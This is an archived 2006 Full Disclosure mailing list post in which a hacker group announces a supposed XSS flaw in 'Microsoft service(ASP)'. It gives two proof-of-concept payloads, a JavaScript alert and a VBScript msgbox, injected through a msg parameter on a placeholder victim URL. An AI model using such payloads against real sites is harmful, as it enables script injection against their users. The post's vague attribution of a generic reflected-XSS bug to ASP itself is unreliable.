Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

New XSS attack to Microsoft service(ASP)

From: saied hackeriran <saiedhackeriran () yahoo com>
Date: Sun, 19 Mar 2006 21:59:39 -0800 (PST)
                 In THe Name Of God
Group:HackeranShiraz
Discoverer:SaiedHacker
/*'============================================*/
We have found a security problem in Microsoft service(ASP).
This problem is a type of XSS attack and occurs while processing The information.
We can cause the problem by a simple (script)code.
/*'============================================*/
Exploit:
alert("SaiedHacker");Http://www.Victim.com/message.asp?msg=<script>alert("SaiedHacker");</script>
  msgbox("SaiedHacker")Http://www.Victim.com/message.asp?msg=<script%20language=vbscript>msgbox("SaiedHacker")</script>
/*'===========================================*/
Have time of your life
SaiedHackerIran () Yahoo com
www.SaiedHackerPro.persianBlog.com

                
---------------------------------
Yahoo! Mail
Bring photos to life! New PhotoMail  makes sharing a breeze. 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: